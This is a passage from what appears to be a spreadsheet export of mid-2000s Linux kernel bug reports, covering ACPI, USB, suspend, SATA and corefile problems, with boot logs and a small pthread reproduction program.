    <t>Most recent kernel where this bug did not occur: untested Distribution: Debian Sarge Hardware Environment: ASUS A6K Turion64 MT 30 lspci output: 0000:00:00.0 Host bridge: Silicon Integrated Systems [SiS]: Unknown device 0756 (rev 02) 0000:00:01.0 PCI bridge: Silicon Integrated Systems [SiS]: Unknown device 0004 0000:00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS964 [MuTIOL Media IO] (rev 36) 0000:00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev 01) 0000:00:02.6 Modem: Silicon Integrated Systems [SiS] AC'97 Modem Controller (rev a0) 0000:00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] Sound Controller (rev a0) 0000:00:03.0 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.1 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.3 USB Controller: Silicon Integrated Systems [SiS] USB 2.0 Controller 0000:00:09.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) 0000:00:0a.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev b3) 0000:00:0a.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller (rev 08) 0000:00:0a.2 0805: Ricoh Co Ltd: Unknown device 0822 (rev 17) 0000:00:0a.3 System peripheral: Ricoh Co Ltd: Unknown device 0592 (rev 08) 0000:00:0b.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 0000:01:00.0 VGA compatible controller: nVidia Corporation: Unknown device 0167 (rev a1) Software Environment: During Boot-up Problem Description: Kernel stalls while initializing ehci_hcd last output while booting: GSI 19 sharing vector 0xC1 and IRQ 19 ACPI: PCI Interrupt 0000:00:03.3[D] -&gt; GSI 23 (level, low) -&gt; IRQ 19 ehci_hcd 0000:00:03.3: EHCI Host Controller this has been tested with both gcc-3.3 and gcc-3.4. Odd enough, sometimes this happens when the notebook is plugged in, and as of yet failed every time to boot as soon as it runs on battery. Steps to reproduce:</t>
  </si>
  <si>
    <t>serial8250: too much work for irq11</t>
  </si>
  <si>
    <t>2.6.13-15</t>
  </si>
  <si>
    <t>2005-12-27 22:54 UTC</t>
  </si>
  <si>
    <t>2008-09-22 09:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: SUSE Hardware Environment: P4M UP-256MB RAM-ALI motherboard with lapic disabled in BIOS-Linux installed on external Maxtor drive connected thru' USB (Laptop - BenQ Joybook 3000 (DH3000)) Software Environment: SUSE Linux 10.0 2.6.13-15 Problem Description: My console gets flooded by message - "Too many requests for irq 11". Obviously, because several devices are using the same irq 11 !! To list out - Graphics card NVidia Geforce4, Sound card Realtek AC'97, USB Mouse, USB Storage (Maxtor 300GB drive on which linux resides), Modem PCTel HSP 56MR and IEEE 1394 firewire !! It definitely is affecting the performance of hardware, cause sometimes the mouse and keyboard do not respond and I can see my Maxtor drive working real hard. I tried to work around by passing lapic command line option for which I get the following output- Local APIC disabled by BIOS - You can enable it by "lapic" I have compiled a kernel with local apic support enabled along with all the necessary options besides enabling ACPI and disabling APM. Yet, I get the same message output on my monitor. When passed the kernel parameter "lapic", it hangs and don't respond to ctrl+alt+del and have to powerdown using the poweroff button. With "lapic" option, kernel dumps a screenful of text like scanning PCI bridge, CPU etc. The last line I see is "PCI: Using configuration 1, PCI base address xxxxxxx". After that it's eternal silence. How can I force enable Local APIC to resolve this IRQ sharing problem ? Steps to reproduce:</t>
  </si>
  <si>
    <t>can't wake on ASUS P5LD2-VM 64-bit</t>
  </si>
  <si>
    <t>2.6.15-mm3 &gt;</t>
  </si>
  <si>
    <t>2005-12-28 09:42 UTC</t>
  </si>
  <si>
    <t>2007-03-07 23:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: tested with 2.6.12 and 2.6.15-rc7 Distribution:ubuntu breezy 64-bit Hardware Environment: Board ASUS P5LD2-VM (i945g + Celeron D) Problem Description: after echo mem &gt; /sys/power/state computer go down but on wake hardware waked up but no image on monitor and no reaktion on eny buttons, SysRq too.</t>
  </si>
  <si>
    <t>PLEXTOR 716sa SATA</t>
  </si>
  <si>
    <t>2.6.14.5</t>
  </si>
  <si>
    <t>2005-12-30 03:47 UTC</t>
  </si>
  <si>
    <t>Lychnoy Aleksey</t>
  </si>
  <si>
    <t>2007-08-08 20:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: intel i865 PERLL Pentium4 2.8 (800) sata segate 250g sata PLEXTOR 716sa (1.08) Software Environment: linux slackware 10.1 kernel 2.6.14.4 atapi_enbled=1 in /drivers/scsi/libata-core.c cdrecord 2.01 Problem Description: #cdrecord -scanbus scsibus0: 0,0,0 0) 'ATA ' 'ST3120827AS ' '3.42' Disk .... scsibus1: 1,0,0 100) 'PLEXTOR' 'DVDR PX-716A' '1.08' Removable CD-ROM .... #cdrecord -v -eject dev=1,0,0 /test.iso start and sleep by 1 min. #dmesg sr 1:0:0:0: timing out command, waited 0s .... #cdrecord -scanbus scsibus0: 0,0,0 0) 'ATA ' 'ST3120827AS ' '3.42' Disk .... scsibus1: 1,0,0 100) ' ' '' '' NON CCS Disk .... Steps to reproduce:</t>
  </si>
  <si>
    <t>ACPI Error on kernel 2.6.14.5</t>
  </si>
  <si>
    <t>2005-12-31 09:41 UTC</t>
  </si>
  <si>
    <t>H</t>
  </si>
  <si>
    <t>2006-03-06 05:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution:Gentoo Linux Hardware Environment:Acer TravelMate 2413WLMi (Laptop) Software Environment:- Problem Description: I just installed linux on a new TravelMate 2413WLMi, and acpi battery doesn't work. I go to /proc/acpi/battery and it has no files (with AC umplugged). I have a kernel configured with ACPI enables (AC Adapter, Battery, Fan, Processor, etc), but i am unable to find battery info. Also, dmesg shows me some errors on boot: [...] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCIB._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs *10 11) ACPI: PCI Interrupt Link [LNKB] (IRQs 10 *11) ACPI: PCI Interrupt Link [LNKC] (IRQs 10 *11) ACPI: PCI Interrupt Link [LNKD] (IRQs 10 *11) ACPI: PCI Interrupt Link [LNKE] (IRQs *10 11) ACPI: PCI Interrupt Link [LNKF] (IRQs *10 11) ACPI: PCI Interrupt Link [LNKG] (IRQs 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKH] (IRQs 10 *11) ACPI: Embedded Controller [EC0] (gpe 23) ACPI-0412: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-0508: *** Error: Method execution failed [\_SB_.PCI0.LPCB.EC0_.BAT0._STA] (Node c14abda0), AE_TIME ACPI-0156: *** Error: Method execution failed [\_SB_.PCI0.LPCB.EC0_.BAT0._STA] (Node c14abda0), AE_TIME Linux Plug and Play Support v0.97 (c) Adam Belay [...] CPI: AC Adapter [ADP1] (off-line) ACPI-0412: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-0508: *** Error: Method execution failed [\_SB_.PCI0.LPCB.EC0_.BAT0._STA] (Node c14abda0), AE_TIME ACPI: Power Button (FF) [PWRF] ACPI: Lid Switch [LID0] ACPI: Sleep Button (CM) [SLPB] ACPI: Video Device [GFX0] (multi-head: yes rom: no post: no) ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Processor [CPU0] (supports 8 throttling states) ACPI-0412: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-0508: *** Error: Method execution failed [\_TZ_.TZS0._TMP] (Node c14a7e20), AE_TIME ACPI-0412: *** Error: Handler for [EmbeddedControl] returned AE_TIME ACPI-0508: *** Error: Method execution failed [\_TZ_.TZS1._TMP] (Node c14a7d20), AE_TIME [...] My complete dmesg output can be found at http://62.15.71.207/kernel/dmesg My kernel config can be found at http://62.15.71.207/kernel/kernel_config_file Steps to reproduce:</t>
  </si>
  <si>
    <t>R</t>
  </si>
  <si>
    <t>soft lockup detected on CPU#0</t>
  </si>
  <si>
    <t>2006-01-04 09:21 UTC</t>
  </si>
  <si>
    <t>2006-02-07 17:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 &gt; this is not regression. Distribution:ubuntu breezy 64-bit Hardware Environment: Board ASUS P5LD2-VM (i945g + Celeron D) With S1 it's generate falowing output with oops echo 1 ? &gt; /proc/acpi/sleep Stopping tasks: ==========| [ACPI Debug] String: [0x04] "SIOS" ACPI: PCI interrupt for device 0000:04:00.0 disabled ACPI: PCI interrupt for device 0000:00:1d.7 disabled acpi_bus-0201 [02] bus_set_power : Device is not power manageable ACPI: PCI interrupt for device 0000:00:1d.3 disabled ACPI: PCI interrupt for device 0000:00:1d.2 disabled ACPI: PCI interrupt for device 0000:00:1d.1 disabled ACPI: PCI interrupt for device 0000:00:1d.0 disabled ACPI: PCI interrupt for device 0000:00:1b.0 disabled PM: Entering standby sleep hwsleep-0284 [03] enter_sleep_state : Entering sleep state [S1] Back to C! PM: Finishing wakeup. BUG: soft lockup detected on CPU#0! CPU 0: Modules linked in: af_packet snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd snd_page_alloc unix Pid: 3138, comm: bash Not tainted 2.6.15-rc7-debug #2 RIP: 0010:[&lt;ffffffff8012cf97&gt;] &lt;ffffffff8012cf97&gt;{release_console_sem+296} RSP: 0018:ffff81003df91cd8 EFLAGS: 00000246 RAX: 0000000000000000 RBX: ffffffff803a7140 RCX: 0000000000003ff6 RDX: 00000000ffffff01 RSI: 0000000000003ff6 RDI: 0000000000003ff6 RBP: 000000058025720b R08: 0000000000000005 R09: 00000000ffffffff R10: ffff81003f5ce520 R11: 0000000000000000 R12: ffffffff80257397 R13: ffff81003df91c48 R14: ffff81003df91d08 R15: 0000003000000010 FS: 00002aaaab0576d0(0000) GS:ffffffff80438800(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 000000000060c000 CR3: 000000003f071000 CR4: 00000000000006e0 Call Trace:&lt;ffffffff8012d246&gt;{vprintk+571} &lt;ffffffff80201f8b&gt;{acpi_hw_low_level_read+299} &lt;ffffffff8012d2f4&gt;{printk+141} &lt;ffffffff8012d2f4&gt;{printk+141} &lt;ffffffff80118a9a&gt;{setup_apic_nmi_watchdog+446} &lt;ffffffff80118b4b&gt;{lapic_nmi_resume+16} &lt;ffffffff80259265&gt;{__sysdev_resume+22} &lt;ffffffff80259507&gt;{sysdev_resume+62} &lt;ffffffff80143f98&gt;{enter_state+442} &lt;ffffffff80218399&gt;{acpi_suspend+70} &lt;ffffffff802184a3&gt;{acpi_system_write_sleep+107} &lt;ffffffff8016519f&gt;{vfs_write+199} &lt;ffffffff80165299&gt;{sys_write+69} &lt;ffffffff8010e57e&gt;{system_call+126} ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 169 ACPI: PCI Interrupt 0000:00:1b.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 193 PCI: Setting latency timer of device 0000:00:1b.0 to 64 ACPI: PCI Interrupt 0000:00:1c.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 169 PCI: Setting latency timer of device 0000:00:1c.0 to 64 ACPI: PCI Interrupt 0000:00:1c.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 177 PCI: Setting latency timer of device 0000:00:1c.1 to 64 ACPI: PCI Interrupt 0000:00:1c.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 185 PCI: Setting latency timer of device 0000:00:1c.2 to 64 ACPI: PCI Interrupt 0000:00:1c.3[D] -&gt; GSI 19 (level, low) -&gt; IRQ 193 PCI: Setting latency timer of device 0000:00:1c.3 to 64 ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 50 PCI: Setting latency timer of device 0000:00:1d.0 to 64 ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 177 PCI: Setting latency timer of device 0000:00:1d.1 to 64 ACPI: PCI Interrupt 0000:00:1d.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 185 PCI: Setting latency timer of device 0000:00:1d.2 to 64 ACPI: PCI Interrupt 0000:00:1d.3[D] -&gt; GSI 19 (level, low) -&gt; IRQ 193 PCI: Setting latency timer of device 0000:00:1d.3 to 64 acpi_bus-0201 [03] bus_set_power : Device is not power manageable PCI: Enabling device 0000:00:1d.7 (0000 -&gt; 0002) ACPI: PCI Interrupt 0000:00:1d.7[A] -&gt; GSI 20 (level, low) -&gt; IRQ 50 PCI: Setting latency timer of device 0000:00:1d.7 to 64 PCI: Setting latency timer of device 0000:00:1e.0 to 64 ACPI: PCI Interrupt 0000:00:1f.1[A] -&gt; GSI 18 (level, low) -&gt; IRQ 185 ACPI: PCI Interrupt 0000:04:00.0[A] -&gt; GSI 17 (level, low) -&gt; IRQ 177 PCI: Setting latency timer of device 0000:04:00.0 to 64 e1000: eth0: e1000_watchdog_task: NIC Link is Up 100 Mbps Full Duplex [ACPI Debug] String: [0x04] "SIOW" Restarting tasks... done</t>
  </si>
  <si>
    <t>Multi-thread corefiles broken since April 2005</t>
  </si>
  <si>
    <t>2.6.11.8 or so  (5df240826c90afdc7956f55a004ea6b702df9203)</t>
  </si>
  <si>
    <t>2006-01-04 10:35 UTC</t>
  </si>
  <si>
    <t>Steve Work</t>
  </si>
  <si>
    <t>2006-01-05 12:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Introduced with 5df240826c90afdc7956f55a004ea6b702df9203 Distribution: Kernel built from tree 5df240826c90afdc7956f55a004ea6b702df9203 or later; Debian and gentoo at least Hardware Environment: i386 PC Software Environment: Debian and gentoo at least Problem Description: Coredumps from programs with more than one thread show garbage information for all threads except the primary. The problem was introduced with: http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=5df240826c90afdc7956f55a004ea6b702df9203 on Apr 16 ("fix crash in entry.S restore_all") and is still present in current builds. "kill -SEGV" this program and "info threads" the resulting corefile to see the problem: #include &lt;pthread.h&gt; static void* thread_sleep(void* x) { while (1) sleep(30); } int main(int c, char** v) { const static int tcount = 5; pthread_t thr[tcount]; int i; for (i=0; i&lt;tcount; ++i) pthread_create(&amp;thr[i], NULL, thread_sleep, NULL); while (1) sleep(30); return 0; } (gdb) info threads 7 process 18138 0x00000246 in ?? () 6 process 18139 0x00000246 in ?? () 5 process 18140 0x00000246 in ?? () 4 process 18141 0x00000246 in ?? () 3 process 18142 0x00000246 in ?? () 2 process 18143 0x00000246 in ?? () * 1 process 18137 0xb7e69db6 in nanosleep () from /lib/tls/libc.so.6 (gdb) All these threads should show a legitimate location (the same spot in nanosleep) and do on kernels prior to the commit named above. (Notice one too many threads listed here also -- is this a related problem?) Commenting out this line (in asm/i386/kernel/process.c:copy_thread) fixes the corefiles: childregs = (struct pt_regs *) ((unsigned long) childregs - 8); but presumably re-introduces the crash the original patch was intended to fix.</t>
  </si>
  <si>
    <t>PCI meta-bug</t>
  </si>
  <si>
    <t>2006-01-04 14:27 UTC</t>
  </si>
  <si>
    <t>2008-05-02 09:20 UTC</t>
  </si>
  <si>
    <t>Jesse Barnes</t>
  </si>
  <si>
    <t>Used for tracking PCI bugs, do not add comments.</t>
  </si>
  <si>
    <t>Enabling ACPI Plug and Play in kernels &gt;2.6.9 kills Parallel support</t>
  </si>
  <si>
    <t>2.6.14-r5 (gentoo)</t>
  </si>
  <si>
    <t>2006-01-05 03:49 UTC</t>
  </si>
  <si>
    <t>Dane Mutters</t>
  </si>
  <si>
    <t>2008-07-15 08:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14-r5 Distribution: Gentoo Hardware Environment: ASUS A8N-SLI Motherboard, AMD64 3200 processor Software Environment: GCC 3.4.4 ... what else do you need? *stumped* Problem Description: I've been attempting to figure out this problem for a long time, and have come to the conclusion that it must be a kernel bug (that or perhaps I'm a bit dense). Whenever I have the option, "Device Drivers &gt; Plug and Play &gt; ACPI Support" enabled, I become unable to print using my parallel port. I'm using an ASUS A8N-SLI motherboard with an AMD64 3200 chip and 1GB of RAM. I have two printers, and this happens with both. Here are some forums in which I have tried to solve this problem: http://forums.gentoo.org/viewtopic-t-416986-highlight-.html http://www.linuxquestions.org/questions/showthread.php?t=380023 Steps to reproduce: Select the "Device Drivers &gt; Plug and Play Support &gt; Plug and Play ACPI Support" option in the kernel, recompile, reboot. Output of `dmesg -s 1000000': 1 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LMAC] (IRQs *3 4 5 7 9 10 11 12 14 15) ACPI: PCI Interrupt Link [LACI] (IRQs 3 4 *5 7 9 10 11 12 14 15) ACPI: PCI Interrupt Link [LMCI] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LSMB] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LUB2] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LIDE] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LSID] (IRQs 3 4 5 7 9 10 *11 12 14 15) ACPI: PCI Interrupt Link [LFID] (IRQs 3 4 *5 7 9 10 11 12 14 15) ACPI: PCI Interrupt Link [LPCA] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [APC1] (IRQs 16) *0, disabled. ACPI: PCI Interrupt Link [APC2] (IRQs 17) *0, disabled. ACPI: PCI Interrupt Link [APC3] (IRQs 18) *0, disabled. ACPI: PCI Interrupt Link [APC4] (IRQs 19) *0, disabled. ACPI: PCI Interrupt Link [APC5] (IRQs *16), disabled. ACPI: PCI Interrupt Link [APCF] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCG] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCH] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCJ] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCK] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCS] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCL] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCZ] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APSI] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APSJ] (IRQs 20 21 22 23) *0, disabled. ACPI: PCI Interrupt Link [APCP] (IRQs 20 21 22 23) *0, disabled. Linux Plug and Play Support v0.97 (c) Adam Belay SCSI subsystem initialized usbcore: registered new driver usbfs usbcore: registered new driver hub PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report TC classifier action (bugs to netdev@vger.kernel.org cc hadi@cyberus.ca) PCI-DMA: Disabling IOMMU. PCI: Bridge: 0000:00:09.0 IO window: 9000-afff MEM window: d0000000-d1ffffff PREFETCH window: 50000000-500fffff PCI: Bridge: 0000:00:0b.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:0c.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:0d.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:0e.0 IO window: disabled. MEM window: c8000000-cfffffff PREFETCH window: c0000000-c7ffffff PCI: Setting latency timer of device 0000:00:09.0 to 64 PCI: Setting latency timer of device 0000:00:0b.0 to 64 PCI: Setting latency timer of device 0000:00:0c.0 to 64 PCI: Setting latency timer of device 0000:00:0d.0 to 64 PCI: Setting latency timer of device 0000:00:0e.0 to 64 IA32 emulation $Id: sys_ia32.c,v 1.32 2002/03/24 13:02:28 ak Exp $ Total HugeTLB memory allocated, 0 Squashfs 2.2 (released 2005/07/03) (C) 2002-2005 Phillip Lougher NTFS driver 2.1.24 [Flags: R/O]. JFS: nTxBlock = 7998, nTxLock = 63989 SGI XFS with ACLs, large block/inode numbers, no debug enabled Initializing Cryptographic API PCI: Setting latency timer of device 0000:00:0b.0 to 64 pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS assign_interrupt_mode Found MSI capability Allocate Port Service[pcie00] Allocate Port Service[pcie03] PCI: Setting latency timer of device 0000:00:0c.0 to 64 pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS assign_interrupt_mode Found MSI capability Allocate Port Service[pcie00] Allocate Port Service[pcie03] PCI: Setting latency timer of device 0000:00:0d.0 to 64 pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS assign_interrupt_mode Found MSI capability Allocate Port Service[pcie00] Allocate Port Service[pcie03] PCI: Setting latency timer of device 0000:00:0e.0 to 64 pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS assign_interrupt_mode Found MSI capability Allocate Port Service[pcie00] Allocate Port Service[pcie03] Real Time Clock Driver v1.12 Non-volatile memory driver v1.2 Linux agpgart interface v0.101 (c) Dave Jones [drm] Initialized drm 1.0.0 20040925 vesafb: framebuffer at 0xc0000000, mapped to 0xffffc20010680000, using 3072k, total 131072k vesafb: mode is 1024x768x16, linelength=2048, pages=1 vesafb: scrolling: redraw vesafb: Truecolor: size=0:5:6:5, shift=0:11:5:0 vesafb: Mode is not VGA compatible Console: switching to colour frame buffer device 128x48 fb0: VESA VGA frame buffer device ACPI: Power Button (FF) [PWRF] ACPI: Power Button (CM) [PWRB] ACPI: Fan [FAN] (on) ACPI: CPU0 (power states: C1[C1]) ACPI: Thermal Zone [THRM] (40 C) ibm_acpi: ec object not found PNP: No PS/2 controller found. Probing ports directly. serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing disabled ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ACPI: PCI Interrupt Link [APC2] enabled at IRQ 17 ACPI: PCI Interrupt 0000:05:07.0[A] -&gt; Link [APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 16 ttyS1 at I/O 0xa400 (irq = 16) is a 16550A mice: PS/2 mouse device common for all mice io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize loop: loaded (max 8 devices) Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx NFORCE-CK804: IDE controller at PCI slot 0000:00:06.0 NFORCE-CK804: chipset revision 242 NFORCE-CK804: not 100% native mode: will probe irqs later NFORCE-CK804: 0000:00:06.0 (rev f2) UDMA133 controller ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:DMA, hdb:DMA ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:DMA Probing IDE interface ide0... input: AT Translated Set 2 keyboard on isa0060/serio0 input: ImExPS/2 Generic Explorer Mouse on isa0060/serio1 hda: WDC WD2500JB-22GVC0, ATA DISK drive hdb: SONY CD-RW CRX220E1, ATAPI CD/DVD-ROM drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: WDC WD205BA, ATA DISK drive hdd: PIONEER DVD-RW DVR-109, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 PDC20269: IDE controller at PCI slot 0000:05:06.0 ACPI: PCI Interrupt Link [APC1] enabled at IRQ 16 ACPI: PCI Interrupt 0000:05:06.0[A] -&gt; Link [APC1] -&gt; GSI 16 (level, low) -&gt; IRQ 17 PDC20269: chipset revision 2 PDC20269: ROM enabled at 0x50000000 PDC20269: 100% native mode on irq 17 ide2: BM-DMA at 0xa000-0xa007, BIOS settings: hde:pio, hdf:pio ide3: BM-DMA at 0xa008-0xa00f, BIOS settings: hdg:pio, hdh:pio Probing IDE interface ide2... hde: WDC WD800JB-00FMA0, ATA DISK drive hdf: SAMSUNG SP0411N, ATA DISK drive ide2 at 0x9000-0x9007,0x9402 on irq 17 Probing IDE interface ide3... Probing IDE interface ide3... hda: max request size: 1024KiB hda: 488397168 sectors (250059 MB) w/8192KiB Cache, CHS=30401/255/63, UDMA(100) hda: cache flushes supported hda: hda1 hda2 hda3 hda4 hdc: max request size: 128KiB hdc: 40088160 sectors (20525 MB) w/2048KiB Cache, CHS=39770/16/63, UDMA(33) hdc: cache flushes not supported hdc: hdc1 hde: max request size: 128KiB hde: 156301488 sectors (80026 MB) w/8192KiB Cache, CHS=65535/16/63, UDMA(100) hde: cache flushes supported hde: hde1 hdf: max request size: 1024KiB hdf: 78242976 sectors (40060 MB) w/2048KiB Cache, CHS=16383/255/63, UDMA(100) hdf: cache flushes supported hdf: hdf1 hdb: ATAPI 52X CD-ROM CD-R/RW drive, 2048kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.20 hdd: ATAPI 40X DVD-ROM DVD-R CD-R/RW drive, 2000kB Cache, UDMA(33) usbmon: debugfs is not available md: linear personality registered as nr 1 md: raid0 personality registered as nr 2 md: raid1 personality registered as nr 3 md: raid5 personality registered as nr 4 raid5: automatically using best checksumming function: generic_sse generic_sse: 6433.000 MB/sec raid5: using function: generic_sse (6433.000 MB/sec) raid6: int64x1 1939 MB/s raid6: int64x2 2800 MB/s raid6: int64x4 2752 MB/s raid6: int64x8 1826 MB/s raid6: sse2x1 1019 MB/s raid6: sse2x2 1754 MB/s raid6: sse2x4 2576 MB/s raid6: using algorithm sse2x4 (2576 MB/s) md: raid6 personality registered as nr 8 md: multipath personality registered as nr 7 md: md driver 0.90.2 MAX_MD_DEVS=256, MD_SB_DISKS=27 md: bitmap version 3.39 device-mapper: 4.4.0-ioctl (2005-01-12) initialised: dm-devel@redhat.com Advanced Linux Sound Architecture Driver Version 1.0.10rc1 (Mon Sep 12 08:13:09 2005 UTC). ALSA device list: No soundcards found. NET: Registered protocol family 2 IP route cache hash table entries: 65536 (order: 7, 524288 bytes) TCP established hash table entries: 262144 (order: 9, 2097152 bytes) TCP bind hash table entries: 65536 (order: 7, 524288 bytes) TCP: Hash tables configured (established 262144 bind 65536) TCP reno registered TCP bic registered NET: Registered protocol family 1 NET: Registered protocol family 10 Disabled Privacy Extensions on device ffffffff8053dac0(lo) IPv6 over IPv4 tunneling driver NET: Registered protocol family 17 NET: Registered protocol family 15 powernow-k8: Found 1 AMD Athlon 64 / Opteron processors (version 1.50.4) powernow-k8: BIOS error - no PSB or ACPI _PSS objects ACPI wakeup devices: HUB0 XVR0 XVR1 XVR2 XVR3 USB0 USB2 MMAC MMCI UAR1 ACPI: (supports S0 S1 S3 S4 S5) BIOS EDD facility v0.16 2004-Jun-25, 4 devices found Freeing unused kernel memory: 200k freed ACPI: PCI Interrupt Link [APCL] enabled at IRQ 23 ACPI: PCI Interrupt 0000:00:02.1[B] -&gt; Link [APCL] -&gt; GSI 23 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:00:02.1 to 64 ehci_hcd 0000:00:02.1: EHCI Host Controller ehci_hcd 0000:00:02.1: debug port 1 ehci_hcd 0000:00:02.1: new USB bus registered, assigned bus number 1 ehci_hcd 0000:00:02.1: irq 18, io mem 0xfeb00000 PCI: cache line size of 64 is not supported by device 0000:00:02.1 ehci_hcd 0000:00:02.1: park 0 ehci_hcd 0000:00:02.1: USB 2.0 initialized, EHCI 1.00, driver 10 Dec 2004 hub 1-0:1.0: USB hub found hub 1-0:1.0: 10 ports detected usbcore: registered new driver hiddev usbcore: registered new driver usbhid drivers/usb/input/hid-core.c: v2.6:USB HID core driver Initializing USB Mass Storage driver... usbcore: registered new driver usb-storage USB Mass Storage support registered. USB Universal Host Controller Interface driver v2.3 ohci_hcd: 2005 April 22 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) ACPI: PCI Interrupt Link [APCF] enabled at IRQ 22 ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; Link [APCF] -&gt; GSI 22 (level, low) -&gt; IRQ 19 PCI: Setting latency timer of device 0000:00:02.0 to 64 ohci_hcd 0000:00:02.0: OHCI Host Controller ohci_hcd 0000:00:02.0: new USB bus registered, assigned bus number 2 ohci_hcd 0000:00:02.0: irq 19, io mem 0xd2004000 hub 2-0:1.0: USB hub found hub 2-0:1.0: 10 ports detected ieee1394: Initialized config rom entry `ip1394' ohci1394: $Rev: 1313 $ Ben Collins &lt;bcollins@debian.org&gt; ACPI: PCI Interrupt 0000:05:0b.0[A] -&gt; Link [APC1] -&gt; GSI 16 (level, low) -&gt; IRQ 17 ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[17] MMIO=[d1008000-d10087ff] Max Packet=[2048] sbp2: $Rev: 1306 $ Ben Collins &lt;bcollins@debian.org&gt; ieee1394: sbp2: Driver forced to serialize I/O (serialize_io=1) ieee1394: sbp2: Try serialize_io=0 for better performance libata version 1.12 loaded. sata_nv version 0.8 ACPI: PCI Interrupt Link [APSI] enabled at IRQ 21 ACPI: PCI Interrupt 0000:00:07.0[A] -&gt; 